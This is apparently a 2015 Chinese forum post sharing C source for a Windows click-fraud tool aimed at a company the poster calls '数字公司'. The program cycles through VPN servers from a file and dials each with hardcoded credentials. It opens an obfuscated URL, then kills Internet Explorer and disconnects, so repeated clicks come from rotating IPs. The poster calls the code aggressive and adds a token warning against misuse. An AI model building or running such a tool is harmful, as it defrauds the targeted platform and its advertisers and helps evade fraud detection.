[原创]数字公司 恶意点击源码
发表于:
2015-5-30 21:08
6987
/*
* 360sb.c
*
*/
#include <stdio.h>
#include <windows.h>
#include <conio.h>
#include <stdio.h>
#include <string.h>
#include <limits.h>
#include <windows.h>
#define INITGUID
#include <initguid.h>
#include <exdisp.h>
#include <memory.h>
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h> char g_szProxyServ[256] = {0}; bool KillIEProcess()
{
HANDLE handle; //定义CreateToolhelp32Snapshot系统快照句柄
HANDLE handle1; //定义要结束进程句柄
handle=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);//获得系统快照句柄
PROCESSENTRY32 *info; //定义PROCESSENTRY32结构字指
//PROCESSENTRY32 结构的 dwSize 成员设置成 sizeof(PROCESSENTRY32)
info=new PROCESSENTRY32;
info->dwSize=sizeof(PROCESSENTRY32);
//调用一次 Process32First 函数,从快照中获取进程列表
Process32First(handle,info);
//重复调用 Process32Next,直到函数返回 FALSE 为止
while(Process32Next(handle,info)!=FALSE)
{
info->szExeFile; //指向进程名字
//strcmp字符串比较函数同要结束相同
if( strcmp("iexplore.exe",info->szExeFile) == 0)
{
// MessageBox (NULL, info->szExeFile, TEXT ("HelloMsg"), 0);
//PROCESS_TERMINATE表示为结束操作打开,FALSE=可继承,info->th32ProcessID=进程ID
handle1=OpenProcess(PROCESS_TERMINATE,FALSE,info->th32ProcessID);
//结束进程
TerminateProcess(handle1,0);
}
}
return 0;
} int main(int argc, char *argv[])
{
char szdir[256]={0},szOut[512]={0};
FILE *fdir=NULL;
char szdir1[256]={0},szOut1[512]={0};
FILE *fdir1=NULL;
fdir=fopen("vpn.txt","rt"); //vpn列表
if (fdir==NULL){
return 0;
}
while (!feof(fdir))
{
fgets(szdir,260,fdir);
strtok(szdir,"\r\n");
if (1)
{
printf("%s\n",szdir);
strncpy(g_szProxyServ, szdir, sizeof(g_szProxyServ));
if(1)
{
WritePrivateProfileString("vpn","PhoneNumber",g_szProxyServ,"C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Network\\Connections\\Pbk\\rasphone.pbk"); system("rasdial vpn bailing 123456"); printf("Enable IE Proxy Successful.\n");
ShellExecute(NULL, "open", "7a5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6g2!0q4y4W2)9&6y4g2!0n7x3q4!0q4y4g2!0m8c8q4)9&6y4#2!0q4y4g2)9^5y4g2!0m8b7#2!0q4y4g2)9^5c8W2!0n7z5q4)9J5k6h3y4G2L8g2)9J5c8Y4y4Q4x3@1k6A6k6g2)9K6c8s2g2@1k6W2)9J5k6o6S2Q4x3U0k6K6K9r3u0Q4x3@1b7I4i4K6t1$3M7%4u0U0i4K6y4p5x3K6j5H3M7$3!0#2i4K6g2X3L8X3g2%4K9r3!0E0k6g2)9J5y4Y4q4Q4x3@1c8Q4c8e0g2Q4z5o6g2Q4b7U0y4Q4c8e0W2Q4z5e0c8Q4b7f1g2Q4c8e0g2Q4b7f1c8Q4z5e0M7`. ", NULL, NULL, SW_SHOWMAXIMIZED);
// post();
Sleep(10000);
// post();
// Sleep(5000);
}
Sleep(5000);
KillIEProcess();
Sleep(5000);
system("rasdial vpn /disconnect"); //断开vpn ////////////////////////////////////
// //清internet临时文件
ShellExecute(NULL, "open", "c:\\iexplore.exe", NULL, NULL, SW_HIDE);
Sleep(5000);
KillIEProcess();
continue;
}
else
printf("%s\r\n",szOut);
}
Sleep(5000);
KillIEProcess();
getch();
return 0;
} 数字公司垃圾极致
没技术就别做平台
4月份开始到现在没处理好
求内幕 本代码具有攻击性,只为共享。切勿乱用
[培训]科锐逆向工程师培训第53期2025年7月8日开班!